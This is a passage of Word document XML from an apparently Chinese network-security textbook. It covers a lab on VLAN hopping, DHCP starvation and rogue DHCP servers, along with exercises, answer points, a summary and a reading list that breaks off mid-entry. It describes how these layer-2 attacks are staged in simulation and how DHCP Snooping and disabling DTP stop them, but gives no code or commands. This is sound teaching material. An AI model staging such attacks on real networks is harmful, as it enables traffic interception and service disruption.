          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及端口限速，复现攻击被阻止的效果。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">伪造实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：搭建合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，同时启动伪造服务器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dnsmasq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置为权威模式）提供不同的默认网关地址。客户端加入网络后验证其获取的配置，再启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阻止非法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OFFER。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在未防御时，交换机端口可从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转变为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Trunk；合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器地址池被虚假</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">占满；客户端获取到伪造的网关并导致流量被重定向。防御机制启用后，以上异常应被消除或大幅抑制。所有测试均在私有模拟环境内完成，严禁在真实园区网上操作【③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简化/概念演示】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="129"/>
    <w:bookmarkStart w:id="130" w:name="习题-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（考察对原理的理解）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解释为什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">双重标签攻击通常只能实现单向通信，而不能建立双向会话。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如何判定一个端口是信任端口还是非信任端口？防御伪造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的关键规则是什么？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在同时存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">饿死攻击的网络环境中，蓝队应如何确定防御优先级？请从攻击面和危害程度两个角度分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题，考虑交换机在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签的处理方式，以及返回路径标签的变化。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题，回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的工作模式：哪些报文允许从非信任端口进入？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题，思考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃可能导致跨</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量泄漏，进而扩大</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击的影响范围；而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">饿死可导致网络中断但可能不直接造成数据泄露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因为攻击者能够将携带内层目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签的帧注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Trunk，但返回流量在被目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的交换机发送回来时，不会自动穿过同样的双层标签路径，除非攻击者的主机也位于能够接收返回流量的特殊位置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，管理员手动将连接合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的端口（或上行链路）配置为信任端口，其余所有端口默认为非信任。安全策略规定：非信任端口不能发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OFFER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器消息，交换机在硬件上直接丢弃这些非法方向的消息。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">优先缓解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃，因为一旦攻击者突破</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隔离，不仅可以嗅探更多广播域流量，还可能直接在其它</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造服务器，使危害急剧扩大。随后部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和限速以阻断饿死与伪造攻击，确保地址分配的可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在已有的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GNS3/EVE-NG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境中，按照前述概念演示指引复现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃（DTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协商）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">饿死攻击，并分别部署对应的防御配置（关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DTP、启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Snooping、设置限速）。记录防御配置施加前后攻击工具的输出差异，并撰写不超过一页的实验笔记，包含网络拓扑简图、关键配置片段（屏蔽真实</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP）与观察结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="130"/>
    <w:bookmarkStart w:id="131" w:name="小结-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃利用的是端口模式协商的宽松信任与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.1Q Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签处理的特性，攻击者通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗或双重标签可以跨越</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">饥饿攻击通过耗尽合法服务器的地址池制造拒绝服务，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造服务器则利用客户端先到先得的机制投毒网络配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二者的攻击假设共同点在于：二层控制平面的协议默认行为没有身份验证，且广播域内任何设备可自由参与信令交互。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃的防御基石是：禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DTP、强制端口模式、修剪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">允许的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN，并对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量打标签。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击的防御基石是：DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区分信任/非信任端口、配合端口限速与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP-MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绑定数据库，并联动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DAI。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从纵深防御角度看，端口安全（MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制）、交换机日志审计以及定期的配置基线核查是必不可少的辅助措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkStart w:id="145" w:name="延伸阅读-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanders, C.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Practical Packet Analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No Starch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Press.（对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.1Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议有抓包实例分析）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bejtlich, R.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Practice of Network Security Monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No Starch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Press.（网络监控策略，包含对二层攻击的检测用例）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络技术（Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Techniques），例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1557.001（LLMNR/NBT-NS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Poisoning and DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Spoofing）等条目</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NIST SP 800-115 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SP 800-53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中关于网络设备配置管理和边界防护的控制项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cisco Press </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关配置指南（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">CCIE/CCNP Enterprise Core</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping、DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和端口安全的内容）【②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境相关：具体命令需参考对应版本白皮书】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽侧重应用层，但其《Testing</w:t>
      </w:r>
      <w:r>
